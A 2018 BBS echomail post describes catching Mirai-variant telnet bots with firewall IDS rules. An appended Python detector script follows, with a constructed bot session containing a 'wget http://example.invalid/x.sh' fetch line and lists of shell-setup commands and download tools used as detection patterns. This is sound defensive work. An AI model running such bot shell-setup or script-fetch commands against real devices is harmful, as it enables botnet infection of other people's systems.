Area: BBS Software Chatter (Networked Database)
From: mark lewis
To: Nick Andre
Subject: Bug in Renegade's Renemail
Date: June 28, 2018 8:31 AM

 On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:

 NA> If a non-ANSI user calls here, I know that 99% of the time it's a
 NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If
 NA> you answer wrong, your IP address is blacklisted in the NET2BBS "kill"
 NA> file. A blacklisted system is trapped and disconnected before the BBS
 NA> loads. I write a separate process that resets the kill file once a
 NA> week in the case of a false-positive.

that's similar to what i do here except i use an IDS on my firewall... ISP
issued modems are shit... just barely enough to call them a
modem/firewall/router... we use ours in bridge mode and have our own dedicated
firewall/router machine protecting the three networks here... this firewall
being one of smoothwall, ipfire, pfSense and similar... we chose ours because
we can customize it if we choose... the IDS comes with but the automated
dropping of unwanted connections is our custom addition...

since i have frontdoor running and answering the connection requests on telnet,
it answers and logs the "DFRS" (data from ring signal)... that should be the
caller-id stuff but on telnet, with these automated mirai variants, they just
spew their credentials and then try to set up their shell... it is because of
frontdoor that i was able to see what was going on... most bbses hide that
data... so anyway, once i knew what was going on, i wrote a few IDS rules to
detect these connections... i followed a few rules, though...

  1. we don't care what name and password they spew.
  2. we DO care if they try to set up their shell.
  3. shell setup is generally always the same
     enable.system.shell.sh
     (dots used for spaces so as to not trip IDS)
  4. after the above they generally try to load busybox
     with some fake module or program call. this call
     is simply a delimiter so they can see when their
     attempt is finished.
  5. sometimes, instead of loading busybox, they try
     to download scripts from somewhere else via tools
     like fgrep, curl, wget, ftpget, tftp, and even echo.

so with the above, we have five IDS rules... one to detect each stage of the
command shell setup attempt... that's really all it takes but we do track the
fake module or program names they try to initiate... that's how the thing got
its name and how the skiddies keep them separated...

in 2016, there were 12 unique variants.
in 2017, there were 30 new unique variants.
in 2018, there have been at least 73 new unique variants.

the most notable thing is that by running the IDS, we're able to detect these
attempts and stop them in the firewall before they even get a chance to get
into the network... sure, the initial part is being fed to the mailer but as
soon as the IDS qualifies the traffic as a mirai variant, it drops the
connection via iptables rules... right now we have rules for each of the unique
modules which we used as our trigger to block the connection but it is just
about to the point where we don't even care about them any more... we could
drop the connection just based on the attempt to set up the shell which would
reduce our rule set to only 4 rules instead of the current 115 we have in
place...

there used to be a lot more attempts as the skiddies attempted to build their
botnets... those attempts have dropped a lot since the beginning... there's
only maybe 5 unique variants that are active... at least going by what is seen
over here... sometimes an older one will come around and we still see some
mirai attempts... one of the funniest ones is using "anarchy" as their fake
module but the actual funny part is they're trying to load "SH" for their shell
instead of "sh"... we all know how *nix systems are case sensitive so we know
this won't work but it could be a second round attempt where the first round
may have gotten in and created a "SH" shell... i dunno but i'm glad to be
having my firewall performing this analysis and blocking rather than submitting
my server to the abuse... that one IDS installation on the firewall is
protecting a number of bbses and they're very happy they don't have to do the
work of analyzing and blocking these skiddie attempts...

at one point in time, our firewall was blocking over 4000 unique IPs that were
known to be infected with a mirai variant... the attempts have fallen off a
whole lot and today we're tracking less than 1000 unique IPs hitting here... i
want to suspect the skids are actually reading their logs and seeing what BBS
and mailer logons look like... i want to suspect they are adjusting their code
to detect those and drop the connection on their own since they can't get in
and do anything... i dunno... maybe it is all just a dream...

)\/(ark

Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin' it
wrong...
... be kind to your four footed friends...
---
 * Origin:  (1:3634/12.73)
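The staged detection mark describes (ignore the credential spew, key the block on the shell-setup sequence, and only track the fake module names as telemetry) can be sketched in a few lines of Python. This is an added example, not mark's IDS rules and not anything from the firewall distributions he names. It assumes a telnet session transcript logged one received line per command, and it assumes the busybox call looks like an optional path, the word `busybox`, then the token; both are assumptions, as is the constructed sample data.

```python
"""Stage-based detector for Mirai-style telnet shell-setup attempts.

Added example, not the poster's IDS rules.  It walks a session transcript
(assumed: one received line per command) and reports which stage of the
post's five-stage pattern the session reached.  The block decision keys on
the shell-setup sequence alone; the per-variant "fake module" token is
only recorded so variants can be counted, the way the post tallies them.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Set

# Stage 3 in the post: the shell-setup sequence is "generally always the same".
SHELL_SETUP = ("enable", "system", "shell", "sh")
# Stage 5: the tools the post lists for fetching scripts from elsewhere.
DOWNLOAD_TOOLS = {"fgrep", "curl", "wget", "ftpget", "tftp", "echo"}
# Stage 4 (assumed layout): optional path, "busybox", then the fake module token.
BUSYBOX_RE = re.compile(r"^(?:/bin/)?busybox\s+(\S+)", re.IGNORECASE)


@dataclass
class Verdict:
    shell_setup: bool = False                               # stage 3 completed in order
    module: Optional[str] = None                            # stage 4 token used as a delimiter
    download_tools: Set[str] = field(default_factory=set)   # stage 5 tools invoked
    block: bool = False                                     # drop decision


def analyze(lines: Iterable[str]) -> Verdict:
    """Classify one session transcript.  Stage 1 (whatever credentials were
    spewed) is deliberately ignored, per rule 1 in the post."""
    v = Verdict()
    pos = 0  # how much of SHELL_SETUP has matched so far
    for raw in lines:
        cmd = raw.strip()
        if not cmd:
            continue
        # Compare case-insensitively so the "SH" variant the post mentions is caught too.
        word = cmd.split()[0].lower()
        if not v.shell_setup:
            if word == SHELL_SETUP[pos]:
                pos += 1
            else:
                pos = 1 if word == SHELL_SETUP[0] else 0  # restart on a stray command
            if pos == len(SHELL_SETUP):
                v.shell_setup = True
                v.block = True  # the "4 rules instead of 115" approach: block on the stage
        m = BUSYBOX_RE.match(cmd)
        if m:
            token = m.group(1)
            if token.lower() in DOWNLOAD_TOOLS:     # e.g. "busybox wget ..."
                v.download_tools.add(token.lower())
            elif v.module is None:
                v.module = token                    # telemetry only, never the trigger
        elif word in DOWNLOAD_TOOLS:
            v.download_tools.add(word)
    return v


def unique_modules(sessions: Iterable[Iterable[str]]) -> Set[str]:
    """Collect the fake module names seen, the way the post counts variants per year."""
    return {v.module for v in map(analyze, sessions) if v.module}


# Constructed transcripts (not captured traffic).  Passwords and URL are placeholders.
MIRAI_LIKE: List[str] = [
    "root", "CONSTRUCTED-PASSWORD",
    "enable", "system", "shell", "SH",          # note the upper-case "SH"
    "/bin/busybox anarchy",
    "wget http://example.invalid/x.sh",
    "/bin/busybox anarchy",
]
BBS_LOGON: List[str] = ["sysop", "CONSTRUCTED-PASSWORD", "M", "R", "Q"]
PARTIAL: List[str] = ["guest", "CONSTRUCTED-PASSWORD", "enable", "system", "Q"]

if __name__ == "__main__":
    for name, session in (("mirai-like", MIRAI_LIKE), ("bbs logon", BBS_LOGON), ("partial", PARTIAL)):
        print(f"{name:10s} -> {analyze(session)}")
    print("variants seen:", unique_modules([MIRAI_LIKE, BBS_LOGON, PARTIAL]))
```

The point of keying the drop on the stage rather than the token is exactly the rule-count argument in the post: a new variant with a new fake module name is still caught by the same four-step match, and the token list only grows as a record of what came by, not as something that has to be maintained before the block works.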